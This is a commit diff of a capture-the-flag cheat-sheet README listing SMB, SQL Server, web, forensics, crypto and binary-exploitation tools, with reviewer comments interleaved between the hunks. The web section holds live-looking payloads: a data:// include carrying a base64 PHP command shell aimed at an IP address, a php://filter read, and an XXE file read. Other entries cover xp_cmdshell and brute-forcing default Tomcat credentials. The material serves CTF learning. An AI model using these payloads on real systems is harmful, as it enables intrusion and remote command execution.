added all

pull/34/head
mr-zero 2020-10-01 04:54:44 +05:30
parent 60c3273b7e
commit 1783d353eb
2 changed files with 141 additions and 73 deletions

172
README.md

@ -17,7 +17,33 @@ are welcome!
1. [Post-Exploitation](#post-exploitation) 1. [Post-Exploitation](#post-exploitation)
2. [Port Enumeration](#port-enumeration) 2. [Port Enumeration](#port-enumeration)
2. [445 (smb/Samba)](#445-smbsamba) 3. [445 (smb/Samba)](#445-smbsamba)
4. [1433 (Microsoft SQL Server)](#1433-microsoft-sql-server)
5. [SNMP](#snmp)
6. [Microsoft Office Macros](#microsoft-office-macros)
7. [Retrieving Network Service Hashes](#retrieving-network-service-hashes)
8. [Windows Reverse Shells](#windows-reverse-shells)
9. [Known Exploits](#known-exploits)
10. [Excess](#excess)
11. [Esoteric Languages](#esoteric-languages)
13. [Steganography](#steganography)
14. [Cryptography](#cryptography)
15. [Networking](#networking)
16. [PHP](#php)
17. [PDF Files](#pdf-files)
18. [Forensics](#forensics)
19. [PNG File Forensics](#png-file-forensics)
20. [APK Forensics](#apk-forensics)
21. [Web](#web)
22. [Reverse Engineering](#reverse-engineering)
23. [PowerShell](#powerShell)
24. [Windows Executables](#windows-executables)
25. [Python Reversing](#python-reversing)
26. [Binary Exploitation/pwn](#binary-exploitationpwn)
27. [VisualBasicScript Reversing](#visualbasicscript-reversing)
28. [Miscellaneous](#miscellaneous)
29. [Jail Breaks](#jail-breaks)
30. [Trivia](#trivia)
--------------- ---------------
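Review bot: the new table of contents skips a number (11. Esoteric Languages is followed directly by 13. Steganography), and the anchor for item 23, `#powerShell`, uses a capital S; Markdown heading anchors are lowercased, so it should be `#powershell` to match the `PowerShell` heading. The first entries are also renumbered inconsistently: `445 (smb/Samba)` moves from 2 to 3 while `Post-Exploitation` and `Port Enumeration` keep 1 and 2, so please confirm whether those two are meant to be nested under a parent item or numbered in the same sequence.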
@ -40,7 +66,7 @@ Port Enumeration
* [`smbmap`](https://github.com/ShawnDEvans/smbmap) * [`smbmap`](https://github.com/ShawnDEvans/smbmap)
`smbmap` tells you permissions and access, which `smbclient` does _not_ do! `smbmap` tells you permissions and access, which `smbclient` does _not_ do!
To try and list shares as the anonymous user **DO THIS** (this doesn't always work for some weird reason) To try and list shares as the anonymous user **DO THIS** (this doesn't always work for some weird reason)
``` ```
@ -74,11 +100,11 @@ enum4linux 10.10.10.125
* `smbclient` * `smbclient`
**NOTE: DEPENDING ON THE VERSION OF SMBCLIENT YOU ARE USING, you may need to SPECIFY the use of S<B version 1 or SMB version 2. You can dp this with `-m SMB2`. Older versions of SMBclient (latest being 4.10 at the time of writing) use SMB1 _by default_.** **NOTE: DEPENDING ON THE VERSION OF SMBCLIENT YOU ARE USING, you may need to SPECIFY the use of S<B version 1 or SMB version 2. You can dp this with `-m SMB2`. Older versions of SMBclient (latest being 4.10 at the time of writing) use SMB1 _by default_.**
You can use `smbclient` to look through files shared with SMB. To _list_ available shares: You can use `smbclient` to look through files shared with SMB. To _list_ available shares:
``` ```
smbclient -m SMB2 -N -L //10.10.10.125/ smbclient -m SMB2 -N -L //10.10.10.125/
``` ```
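Review bot: the bold NOTE line carries two typos that survive the change, `S<B version 1` should read `SMB version 1` and `dp this` should read `do this`. The statement that 4.10 is the latest smbclient "at the time of writing" is time-bound and will mislead readers later; either date it or drop the version number.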
@ -94,13 +120,13 @@ You will see a `smb: \>` prompt, and you can use `ls` and `get` to retrieve file
------------------------------ ------------------------------
* `impacket` -> `mssqlclient.py` * `impacket` -> `mssqlclient.py`
You can connect to a Microsoft SQL Server with `myssqlclient.py` knowing a username and password like so: You can connect to a Microsoft SQL Server with `myssqlclient.py` knowing a username and password like so:
``` ```
mssqlclient.py username@10.10.10.125 mssqlclient.py username@10.10.10.125
``` ```
It will prompt you for a password. **If your password fails, the server might be using "Windows authentication", which you can use with:** It will prompt you for a password. **If your password fails, the server might be using "Windows authentication", which you can use with:**
``` ```
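Review bot: the sentence says `myssqlclient.py` but the command block below it runs `mssqlclient.py` (the actual impacket script name); fix the spelling in the prose so the two agree.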
@ -111,7 +137,7 @@ If you have access to a Micosoft SQL Server, you can try and `enable_xp_cmdshell
``` ```
SQL> enable_xp_cmdshell SQL> enable_xp_cmdshell
``` ```
though, you may not have permission. If that DOES succeed, you can now run commands like: though, you may not have permission. If that DOES succeed, you can now run commands like:
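Review bot: the context line in the hunk header still reads `Micosoft SQL Server`; should be `Microsoft`. The sentence starting with lowercase `though, you may not have permission` reads as a fragment and should be joined to or capitalised after the code block.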
@ -181,16 +207,16 @@ Known Exploits
------------------ ------------------
* Java RMI * Java RMI
Metasploit module: `exploit/multi/misc/java_rmi_server` Metasploit module: `exploit/multi/misc/java_rmi_server`
When testing this, responses are _known to come back with an error or exception_. Your code MAY VERY WELL still be executing. Try and run commands that include a callback. And _use Python_ to live off the land and try avoid special characters, like `|` pipes! [ysoserial](https://github.com/frohoff/ysoserial) is a good tool for deserializing Java code to take advantage of this vulnerability. When testing this, responses are _known to come back with an error or exception_. Your code MAY VERY WELL still be executing. Try and run commands that include a callback. And _use Python_ to live off the land and try avoid special characters, like `|` pipes! [ysoserial](https://github.com/frohoff/ysoserial) is a good tool for deserializing Java code to take advantage of this vulnerability.
* Heartbleed * Heartbleed
Metasploit module: `auxiliary/scanner/ssl/openssl_heartbleed` Metasploit module: `auxiliary/scanner/ssl/openssl_heartbleed`
Be sure to use `set VERBOSE true` to see the retrieved results. This can often contain a flag or some valuable information. Be sure to use `set VERBOSE true` to see the retrieved results. This can often contain a flag or some valuable information.
* libssh - SSH * libssh - SSH
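Review bot: in the Java RMI paragraph, `try avoid special characters` should read `try to avoid`, and the description of ysoserial is inaccurate: it generates serialized gadget-chain payloads for unsafe deserialization, it does not "deserialize Java code", so reword that sentence so readers understand what the tool is actually for.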
@ -204,7 +230,7 @@ Known Exploits
If you can determine that you are working with an Apache Tomcat server (usually by visiting pages that do not exist and seeing a 404 error message), try to visit `/Manager`, which is usually accessible on Tomcat. Possible credentials could be `tomcat:tomcat`, `tomcat:s3cr3t`, `admin:s3cr3t`, `root:s3cr3t`, etc. etc.. Worthy of bruteforcing with `hydra`. If you can determine that you are working with an Apache Tomcat server (usually by visiting pages that do not exist and seeing a 404 error message), try to visit `/Manager`, which is usually accessible on Tomcat. Possible credentials could be `tomcat:tomcat`, `tomcat:s3cr3t`, `admin:s3cr3t`, `root:s3cr3t`, etc. etc.. Worthy of bruteforcing with `hydra`.
If you see URLs are appended with a `.action` (not a `.do`), you may be working with Apache Struts. If you see URLs are appended with a `.action` (not a `.do`), you may be working with Apache Struts.
* Apache Struts * Apache Struts
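Review bot: `etc. etc..` ends with a doubled period; `etc.` once is enough. "which is usually accessible on Tomcat" is a vague claim; state that the manager application is only present when it has been deployed and left reachable, so readers know why the check can fail.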
@ -235,7 +261,7 @@ Esoteric Languages
* [https://tio.run/](https://tio.run/) * [https://tio.run/](https://tio.run/)
An online tool that has a ton of Esoteric language interpreters. An online tool that has a ton of Esoteric language interpreters.
* Brainfuck * Brainfuck
@ -280,9 +306,9 @@ Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.
``` ```
* [Rockstar](https://codewithrockstar.com/) * [Rockstar](https://codewithrockstar.com/)
A language intended to look like song lyrics [github link](https://github.com/RockstarLang/rockstar). A language intended to look like song lyrics [github link](https://github.com/RockstarLang/rockstar).
below is fizzbuzz in Rockstar: below is fizzbuzz in Rockstar:
``` ```
Midnight takes your heart and your soul Midnight takes your heart and your soul
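Review bot: `below is fizzbuzz in Rockstar:` starts a sentence in lowercase and `[github link]` should be `GitHub`; minor, but the rest of the file capitalises both.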
@ -293,7 +319,7 @@ Give back your heart
Desire is a lovestruck ladykiller Desire is a lovestruck ladykiller
My world is nothing My world is nothing
Fire is ice Fire is ice
Hate is water Hate is water
Until my world is Desire, Until my world is Desire,
@ -338,7 +364,7 @@ Steganography
* [`steghide`][steghide] * [`steghide`][steghide]
A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge. A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge.
* [`stepic`](http://domnit.org/stepic/doc/) * [`stepic`](http://domnit.org/stepic/doc/)
@ -372,7 +398,7 @@ Steganography
* Other stego tools: * Other stego tools:
[https://github.com/DominicBreuker/stego-toolkit](https://github.com/DominicBreuker/stego-toolkit) [https://github.com/DominicBreuker/stego-toolkit](https://github.com/DominicBreuker/stego-toolkit)
* [`zsteg`][zsteg] * [`zsteg`][zsteg]
Command-line tool for use against Least Significant Bit steganography... unfortunately only works against PNG and BMP images. Command-line tool for use against Least Significant Bit steganography... unfortunately only works against PNG and BMP images.
@ -399,7 +425,7 @@ Steganography
``` ```
mplayer -af scaletempo -speed 64 flag.mp3 mplayer -af scaletempo -speed 64 flag.mp3
``` ```
* DNA Codes * DNA Codes
@ -437,7 +463,7 @@ exiftool -b -ThumbnailImage my_image.jpg > my_thumbnail.jpg
* [`hipshot`][hipshot] * [`hipshot`][hipshot]
A [Python] module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a [QR code] visible in a video, displayed through "Star Wars" style text motion. A [Python] module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a [QR code] visible in a video, displayed through "Star Wars" style text motion.
* [QR code] * [QR code]
@ -445,12 +471,12 @@ exiftool -b -ThumbnailImage my_image.jpg > my_thumbnail.jpg
* [`zbarimg`][zbarimg] * [`zbarimg`][zbarimg]
A command-line tool to quickly scan multiple forms of barcodes, [QR codes] included. Installed like so on a typical [Ubuntu] image: A command-line tool to quickly scan multiple forms of barcodes, [QR codes] included. Installed like so on a typical [Ubuntu] image:
``` ```
sudo apt install zbar-tools sudo apt install zbar-tools
``` ```
* Punctuation marks `!`, `.` and `?` * Punctuation marks `!`, `.` and `?`
I have seen some challenges use just the end of `.` or `?` or `!` to represent the [Ook](http://esolangs.org/wiki/ook!) esoteric programming language. Don't forget that is a thing! I have seen some challenges use just the end of `.` or `?` or `!` to represent the [Ook](http://esolangs.org/wiki/ook!) esoteric programming language. Don't forget that is a thing!
@ -459,10 +485,10 @@ Cryptography
----------------- -----------------
* Cryptii * Cryptii
[https://cryptii.com](https://cryptii.com) has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more. [https://cryptii.com](https://cryptii.com) has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more.
* Keyboard Shift * Keyboard Shift
[https://www.dcode.fr/keyboard-shift-cipher](https://www.dcode.fr/keyboard-shift-cipher) If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift... [https://www.dcode.fr/keyboard-shift-cipher](https://www.dcode.fr/keyboard-shift-cipher) If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift...
* Bit Shift * Bit Shift
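Review bot: `Ceaser Cipher` should be `Caesar Cipher`, and `any thing` should be `anything`. The Keyboard Shift entry also runs the URL straight into the sentence; put the link on its own line the way the neighbouring entries do.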
@ -522,14 +548,14 @@ Cryptography
[https://www.dcode.fr/beaufort-cipher](https://www.dcode.fr/beaufort-cipher) [https://www.dcode.fr/beaufort-cipher](https://www.dcode.fr/beaufort-cipher)
* [Bacon Cipher](https://en.wikipedia.org/wiki/Bacon%27s_cipher) * [Bacon Cipher](https://en.wikipedia.org/wiki/Bacon%27s_cipher)
A substitution cipher that replaces each character with five characters from a set of two (A and B is used most of the time). If we look at A as 0 and B as 1 it is a special encoding to binary numbers, where the character A has the value of binary `b00000`. Easy to recognize, because the ciphertext only contains two characters (e.g.: A and B) and the length of the ciphertext is divisible by 5. Example: `AAABB AAABA ABBAB AAABB AABAA AAAAB AAAAA AAABA ABBAB ABBAA`. A substitution cipher that replaces each character with five characters from a set of two (A and B is used most of the time). If we look at A as 0 and B as 1 it is a special encoding to binary numbers, where the character A has the value of binary `b00000`. Easy to recognize, because the ciphertext only contains two characters (e.g.: A and B) and the length of the ciphertext is divisible by 5. Example: `AAABB AAABA ABBAB AAABB AABAA AAAAB AAAAA AAABA ABBAB ABBAA`.
[Online tool](http://rumkin.com/tools/cipher/baconian.php) [Online tool](http://rumkin.com/tools/cipher/baconian.php)
* Python random module cracker/predictor * Python random module cracker/predictor
[https://github.com/tna0y/Python-random-module-cracker](https://github.com/tna0y/Python-random-module-cracker)... helps attack the Mersenne Twister used in Python's random module. [https://github.com/tna0y/Python-random-module-cracker](https://github.com/tna0y/Python-random-module-cracker)... helps attack the Mersenne Twister used in Python's random module.
* Transposition Cipher * Transposition Cipher
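Review bot: in the Bacon Cipher entry, `A and B is used most of the time` should be `are used`, and "it is a special encoding to binary numbers" is awkward; "each group of five letters is simply a 5-bit binary number" says the same thing more clearly. The example ciphertext is fine as given (ten groups of five).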
@ -560,8 +586,8 @@ def root3rd(x):
y3 = y**3 y3 = y**3
d = (2*y3+x) d = (2*y3+x)
y1 = (y*(y3+2*x)+d//2)//d y1 = (y*(y3+2*x)+d//2)//d
return y return y
``` ```
* RSA: Wiener's Little D Attack * RSA: Wiener's Little D Attack
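Review bot: the visible tail of `root3rd` computes the refined iterate `y1 = (y*(y3+2*x)+d//2)//d` and then does `return y`, so `y1` is never used on these lines. If the loop above does not assign `y = y1` or compare the two before this point, the last refinement step is dead code and the function returns the previous approximation; please check the loop body that is cut off above the hunk.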
@ -569,7 +595,7 @@ def root3rd(x):
* RSA: Boneh-Durfee Attack * RSA: Boneh-Durfee Attack
The tellgate sign for this kind of challenge is also an enormously large `e` value (`e` and `n` have similar size). The tellgate sign for this kind of challenge is also an enormously large `e` value (`e` and `n` have similar size).
Some code for this attack can be found [here](https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage) Some code for this attack can be found [here](https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage)
* RSA: Chinese Remainder Attack * RSA: Chinese Remainder Attack
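Review bot: `tellgate sign` should be `telltale sign`. The sentence "Some code for this attack can be found here" would be clearer if it named the file it links (`boneh_durfee.sage`), since the link text `here` gives no hint that SageMath is required to run it.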
@ -654,7 +680,7 @@ Networking
* [Wireshark] * [Wireshark]
The go-to tool for examining [`.pcap`][PCAP] files. The go-to tool for examining [`.pcap`][PCAP] files.
* [Network Miner] * [Network Miner]
@ -670,7 +696,7 @@ editcap old_file.pcapng new_file.pcap
* [`tcpflow`][tcpflow] * [`tcpflow`][tcpflow]
A command-line tool for reorganizing packets in a PCAP file and getting files out of them. __Typically it gives no output, but it creates the files in your current directory!__ A command-line tool for reorganizing packets in a PCAP file and getting files out of them. __Typically it gives no output, but it creates the files in your current directory!__
``` ```
tcpflow -r my_file.pcap tcpflow -r my_file.pcap
@ -732,7 +758,7 @@ PHP
* `preg_replace` * `preg_replace`
A bug in older versions of [PHP] where the user could get remote code execution A bug in older versions of [PHP] where the user could get remote code execution
[http://php.net/manual/en/function.preg-replace.php](http://php.net/manual/en/function.preg-replace.php) [http://php.net/manual/en/function.preg-replace.php](http://php.net/manual/en/function.preg-replace.php)
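Review bot: "A bug in older versions of PHP where the user could get remote code execution" does not say which feature is meant; the issue is the `/e` (eval) pattern modifier of `preg_replace`, deprecated in PHP 5.5 and removed in PHP 7.0. Naming the modifier and the affected versions lets readers tell at a glance whether a given target version is relevant, instead of leaving it as an unexplained "bug".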
@ -756,14 +782,14 @@ http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
``` ```
http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4= http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
``` ```
PDF Files PDF Files
------------- -------------
* `pdfinfo` * `pdfinfo`
A command-line tool to get a basic synopsis of what the [PDF] file is. A command-line tool to get a basic synopsis of what the [PDF] file is.
* `pdfcrack` * `pdfcrack`
@ -785,9 +811,9 @@ Forensics
To decompile bytecode, use `uncompyle6`. There is one special argument (I think `-d` or something???) that can have success if the default operation does not work. Do not give up hope when working with obvious Python bytecode. EasyPythonDecompiler might work, or perhaps testing with `uncompyle` To decompile bytecode, use `uncompyle6`. There is one special argument (I think `-d` or something???) that can have success if the default operation does not work. Do not give up hope when working with obvious Python bytecode. EasyPythonDecompiler might work, or perhaps testing with `uncompyle`
* Keepass * Keepass
`keepassx` can be installed on Ubuntu to open and explore Keepass databases. Keepass databases master passwords can be cracked with `keepass2john`. `keepassx` can be installed on Ubuntu to open and explore Keepass databases. Keepass databases master passwords can be cracked with `keepass2john`.
* [Magic Numbers] * [Magic Numbers]
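Review bot: `(I think `-d` or something???)` should not be committed as-is; verify the uncompyle6 option you mean and name it, or drop the parenthetical. Also `Keepass databases master passwords` should read `KeePass database master passwords`, and `keepassx` is the package name while the product is KeePassX.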
@ -839,13 +865,13 @@ sudo apt install foremost
* [photorec] * [photorec]
Another command-line utility that comes with `testdisk`. It is file data recovery software designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted. Another command-line utility that comes with `testdisk`. It is file data recovery software designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted.
* [Analysis Image] ['https://29a.ch/photo-forensics/#forensic-magnifier'] * [Analysis Image] ['https://29a.ch/photo-forensics/#forensic-magnifier']
Forensically is free online tool to analysis image this tool has many features like Magnifier, Clone Detection, Error Level analysis, Noise Analusis, level Sweep, Meta Data, Geo tags, Thumbnail Analysis , JPEG Analysis, Strings Extraction. Forensically is free online tool to analysis image this tool has many features like Magnifier, Clone Detection, Error Level analysis, Noise Analusis, level Sweep, Meta Data, Geo tags, Thumbnail Analysis , JPEG Analysis, Strings Extraction.
PNG File Forensics PNG File Forensics
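Review bot: `[Analysis Image] ['https://29a.ch/photo-forensics/#forensic-magnifier']` is not valid Markdown link syntax (quotes inside square brackets render literally); use `[Forensically](https://29a.ch/photo-forensics/#forensic-magnifier)`. The description also needs grammar fixes: "free online tool to analysis image" should be "a free online tool to analyze images", `Noise Analusis` should be `Noise Analysis`, `level Sweep` should be `Level Sweep`, and there is a stray space before the comma after `Thumbnail Analysis`.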
@ -887,7 +913,7 @@ apktool d <file.apk>
* [`jd-gui`][jd-gui] * [`jd-gui`][jd-gui]
A GUI tool to decompile Java code, and JAR files. A GUI tool to decompile Java code, and JAR files.
Web Web
---------------- ----------------
@ -909,13 +935,13 @@ Web
This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check. This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check.
* `/.git/` * `/.git/`
A classic CTF challenge is to leave a `git` repository live and available on a website. You can see this with `nmap -A` (or whatever specific script catches it) and just by trying to view that specific folder, `/.git/`. A good command-line tool for this is [`GitDumper.sh`](https://github.com/internetwache/GitTools), or just simply using [`wget`][wget]. A classic CTF challenge is to leave a `git` repository live and available on a website. You can see this with `nmap -A` (or whatever specific script catches it) and just by trying to view that specific folder, `/.git/`. A good command-line tool for this is [`GitDumper.sh`](https://github.com/internetwache/GitTools), or just simply using [`wget`][wget].
**Sometimes you might Bazaar or Mercurial or other distributed version control systems. You can use [https://github.com/kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) for those!!** **Sometimes you might Bazaar or Mercurial or other distributed version control systems. You can use [https://github.com/kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) for those!!**
* [`GitDumper.sh`][GitDumper.sh] * [`GitDumper.sh`][GitDumper.sh]
A command-line tool that will automatically scrape and download a [git] repository hosted online with a given URL. A command-line tool that will automatically scrape and download a [git] repository hosted online with a given URL.
* Bazaar `.bzr` * Bazaar `.bzr`
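Review bot: "Sometimes you might Bazaar or Mercurial" is missing its verb ("you might find Bazaar or Mercurial"), and the double `!!` at the end of the bold sentence should be a single exclamation mark or a period.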
@ -940,7 +966,7 @@ Web
* [CloudFlare Bypass](https://github.com/Anorov/cloudflare-scrape) * [CloudFlare Bypass](https://github.com/Anorov/cloudflare-scrape)
If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module. If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module.
``` python ``` python
#!/usr/bin/env python #!/usr/bin/env python
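Review bot: "you can do it like this with linked Python module" should read "with the linked Python module", and `DDOS` is conventionally written `DDoS`. The fence tag `\`\`\` python` has a space after the backticks; some renderers ignore the language tag when it is separated that way, so write it as `\`\`\`python`.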
@ -948,8 +974,8 @@ import cfscrape
url = 'http://yashit.tech/tryharder/' url = 'http://yashit.tech/tryharder/'
scraper = cfscrape.create_scraper() scraper = cfscrape.create_scraper()
print scraper.get(url).content print scraper.get(url).content
``` ```
* [XSStrike] * [XSStrike]
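Review bot: `print scraper.get(url).content` is Python 2 syntax; combined with the `#!/usr/bin/env python` shebang in the previous hunk, this is a SyntaxError on any system where `python` resolves to Python 3. Use `print(scraper.get(url).content)` so the snippet runs under both.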
@ -958,7 +984,7 @@ print scraper.get(url).content
* [`wpscan`][wpscan] * [`wpscan`][wpscan]
* A Ruby script to scan and do reconnaissance on a [Wordpress] application. * A Ruby script to scan and do reconnaissance on a [Wordpress] application.
* Mac AutoLogin Password Cracking * Mac AutoLogin Password Cracking
@ -989,15 +1015,15 @@ We try to display the content of the file /flag :
<data>&file;</data> <data>&file;</data>
<?xml version="1.0" encoding="UTF-16"?> <?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
<!ELEMENT foo ANY > <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]><foo>&xxe;</foo> <!ENTITY xxe SYSTEM "file:///flag" >]><foo>&xxe;</foo>
``` ```
* Wordpress Password Hash Generator * Wordpress Password Hash Generator
If you make it into a Wordpress database and can change passwords, reset the admin password to a new hash: [http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4](http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4). This will let you login to /wp-admin/ on the site. If you make it into a Wordpress database and can change passwords, reset the admin password to a new hash: [http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4](http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4). This will let you login to /wp-admin/ on the site.
* Cookie Catcher * Cookie Catcher
* [`requestb.in`](https://requestb.in/) * [`requestb.in`](https://requestb.in/)
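Review bot: the XXE block ends one XML document with `<data>&file;</data>` and then starts a second with `<?xml version="1.0" encoding="UTF-16"?>` inside the same fenced block; an XML declaration is only valid at the start of a document, so split these into two code blocks (and label what the UTF-16 variant is for). In the Wordpress entry, `let you login to` should be `let you log in to`.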
@ -1010,7 +1036,7 @@ We try to display the content of the file /flag :
* [`sqlmap`][sqlmap] * [`sqlmap`][sqlmap]
A command-line tool written in [Python] to automatically detect and exploit vulnerable SQL injection points. A command-line tool written in [Python] to automatically detect and exploit vulnerable SQL injection points.
* Flask Template Injection * Flask Template Injection
@ -1025,11 +1051,11 @@ We try to display the content of the file /flag :
* Explicit SQL Injection * Explicit SQL Injection
* Blind SQL Injection * Blind SQL Injection
* MongoDB * MongoDB
Get MongoDB properly installed: Get MongoDB properly installed:
@ -1063,8 +1089,8 @@ c.find()
``` ```
* gobuster * gobuster
* DirBuster * DirBuster
@ -1092,7 +1118,7 @@ Reverse Engineering
Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: `ltrace ./binary` Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: `ltrace ./binary`
* [Hopper](https://www.hopperapp.com) * [Hopper](https://www.hopperapp.com)
Hopper Disassembler, the reverse engineering tool that lets you disassemble, decompile and debug your applications. Hopper Disassembler, the reverse engineering tool that lets you disassemble, decompile and debug your applications.
* [Binary Ninja](https://binary.ninja) * [Binary Ninja](https://binary.ninja)
@ -1118,7 +1144,7 @@ Reverse Engineering
* Compiling & running ASM code: * Compiling & running ASM code:
You can convert ASM functions from assembly and run them as C functions like the following: You can convert ASM functions from assembly and run them as C functions like the following:
`asm4.S` `asm4.S`
```asm ```asm
.intel_syntax noprefix .intel_syntax noprefix
@ -1139,7 +1165,7 @@ Reverse Engineering
add eax,edx add eax,edx
movzx eax,BYTE PTR [eax] movzx eax,BYTE PTR [eax]
test al,al test al,al
jne label1 jne label1
mov DWORD PTR [ebp-0x8],0x1 mov DWORD PTR [ebp-0x8],0x1
jmp label3 jmp label3
label4: label4:
@ -1184,7 +1210,7 @@ Reverse Engineering
add esp,0x10 add esp,0x10
pop ebx pop ebx
pop ebp pop ebp
ret ret
``` ```
`asm4.c` `asm4.c`
@ -1225,7 +1251,7 @@ Windows Executables
* [`pefile`][pefile] * [`pefile`][pefile]
A [Python] module that examines the headers in a Windows [PE (Portable Executable)][PE] file. A [Python] module that examines the headers in a Windows [PE (Portable Executable)][PE] file.
* [dnSpy] * [dnSpy]
@ -1233,14 +1259,14 @@ Windows Executables
* [PEiD][PEiD] * [PEiD][PEiD]
A [Windows] tool to detect common packers, cryptors and compilers for [Windows][Windows] [PE][PE] A [Windows] tool to detect common packers, cryptors and compilers for [Windows][Windows] [PE][PE]
* jetBrains .NET decompiler * jetBrains .NET decompiler
* AutoIT converter * AutoIT converter
When debugging AutoIT programs, you may get a notification: "This is a compiled AutoIT script". Here is a good thing to use to decode them: [https://www.autoitscript.com/site/autoit/downloads/](https://www.autoitscript.com/site/autoit/downloads/) When debugging AutoIT programs, you may get a notification: "This is a compiled AutoIT script". Here is a good thing to use to decode them: [https://www.autoitscript.com/site/autoit/downloads/](https://www.autoitscript.com/site/autoit/downloads/)
Python Reversing Python Reversing
------------ ------------
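Review bot: `jetBrains .NET decompiler` should be `JetBrains` and, unlike the neighbouring entries, has neither a description nor a link; add the product name and URL or drop the bullet. `AutoIT` is spelled `AutoIt` by the vendor; the linked downloads page is the general AutoIt download page, so say which tool on it is meant.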
@ -1255,7 +1281,7 @@ Binary Exploitation/pwn
* Basic Stack Overflow * Basic Stack Overflow
Use `readelf -s <binary>` to get the location of a function to jump to -- overflow in Python, find offset with `dmesg`, and jump. Use `readelf -s <binary>` to get the location of a function to jump to -- overflow in Python, find offset with `dmesg`, and jump.
* `printf` vulnerability * `printf` vulnerability
@ -1267,7 +1293,7 @@ Binary Exploitation/pwn
* 64-bit Buffer Overflow * 64-bit Buffer Overflow
64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with `readelf -s`). But, check if whether or not the function address you need starts with the same hex values already on the stack (in `rsp`). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address. 64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with `readelf -s`). But, check if whether or not the function address you need starts with the same hex values already on the stack (in `rsp`). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address.
VisualBasicScript Reversing VisualBasicScript Reversing
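Review bot: "check if whether or not the function address you need starts with" should be "check whether the function address you need starts with"; the doubled conjunction makes the sentence hard to parse.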
@ -1339,7 +1365,7 @@ l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ 𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ
``` ```
* [Base41](https://github.com/sveljko/base41/blob/master/python/base41.py) * [Base41](https://github.com/sveljko/base41/blob/master/python/base41.py)
* Mac / Macintosh / Apple Hidden Files `.DS_Store` [ds_store_exp](https://github.com/lijiejie/ds_store_exp) * Mac / Macintosh / Apple Hidden Files `.DS_Store` [ds_store_exp](https://github.com/lijiejie/ds_store_exp)
